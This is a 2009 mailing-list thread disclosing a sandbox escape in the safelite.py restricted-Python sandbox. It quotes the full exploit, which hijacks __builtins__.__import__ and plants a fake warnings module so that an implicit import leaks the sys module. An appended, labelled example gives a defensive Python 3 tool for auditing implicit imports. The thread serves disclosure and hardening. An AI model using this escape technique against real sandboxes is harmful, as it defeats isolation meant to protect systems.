Daniel emailed in the exploit below and it is pretty devastating. It takes advantage of the fact that the warnings framework in 2.6+ dynamically imports modules without being explicitly called!!
I've fixed this hole in safelite.py, but would be interested to know if there are other non-user-initiated dynamically imported modules?

Thanks Daniel for bringing this to our attention!

On Tue, Feb 24, 2009 at 4:46 AM, Daniel (ajax) Diniz <aja...@gmail.com> wrote:
> Here's my attempt. Uses the builtin warnings module. You might need to
> change 'args[1]' to 'args[2]' depending on your environment.
>
> I really don't like to post these to public MLs, but feel free to do
> so if you think no harm may arise from this one ;)
>
> Daniel
> ----
>
> from safelite import FileReader
>
> # Let's build a fake module
> warnings = __builtins__.__class__('warnings')
>
> # Fill it with deception
> warnings.default_action = "ignore"
>
> # And provide a supporting thug
> def __import__(*args):
>     try:
>         print "How nice:\n", args[1].keys()
>         global sys
>         sys = args[1]['sys']
>
>     except Exception, v:
>         print "Exception:", v
>     return warnings
>
> # Put the bogus module at the doorstep...
> __builtins__.warnings = warnings
>
> # and have the thug replacing the doorman
> __builtins__.__import__ = __import__
>
> # An unsuspecting customer passes by...
> FileReader('safelite.py').seek(1.1)
>
> # ... and is brutally mugged :)
> print sys
> print dir(sys)
>

--
love, tav

plex:espians/tav | t...@espians.com | +44 (0) 7809 569 369
http://tav.espians.com | http://twitter.com/tav | skype:tavespian
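
Added example, not part of the original thread or of safelite.py: one way to audit for the "non-user-initiated dynamically imported modules" asked about above is to record every call that reaches builtins.__import__ while a sandboxed operation runs, and flag the ones the calling module did not request. It is written for Python 3; `fakelib`, `record_imports` and `implicit_imports` are hypothetical names, and `fakelib.seek` is a constructed stand-in for a library call that imports `warnings` lazily.

```python
import builtins
import types
from contextlib import contextmanager


@contextmanager
def record_imports():
    """Log (requesting module, imported name) for each builtins.__import__ call.

    Not thread-safe: it swaps a process-wide hook. Imports made through C paths
    that bypass builtins.__import__ are not seen.
    """
    seen = []
    real_import = builtins.__import__

    def auditing_import(name, globals=None, locals=None, fromlist=(), level=0):
        requester = (globals or {}).get("__name__", "<no globals>")
        seen.append((requester, name))
        return real_import(name, globals, locals, fromlist, level)

    builtins.__import__ = auditing_import
    try:
        yield seen
    finally:
        builtins.__import__ = real_import  # always restore the real hook


def implicit_imports(func, caller_module):
    """Imports triggered while running func() that caller_module did not ask for."""
    with record_imports() as seen:
        func()
    return sorted({(req, name) for req, name in seen if req != caller_module})


# Constructed stand-in for a library call that imports lazily on a warning path.
fakelib = types.ModuleType("fakelib")
exec(
    "def seek(pos):\n"
    "    if not isinstance(pos, int):\n"
    "        import warnings\n"
    "        warnings.warn('integer argument expected', DeprecationWarning)\n",
    fakelib.__dict__,
)

if __name__ == "__main__":
    for requester, name in implicit_imports(lambda: fakelib.seek(1.1), __name__):
        print(f"{requester} imported {name!r} without the caller asking")
```

Every (requester, name) pair it reports is a place where code the sandbox trusts resolves a module through a hook the sandboxed code may be able to reach.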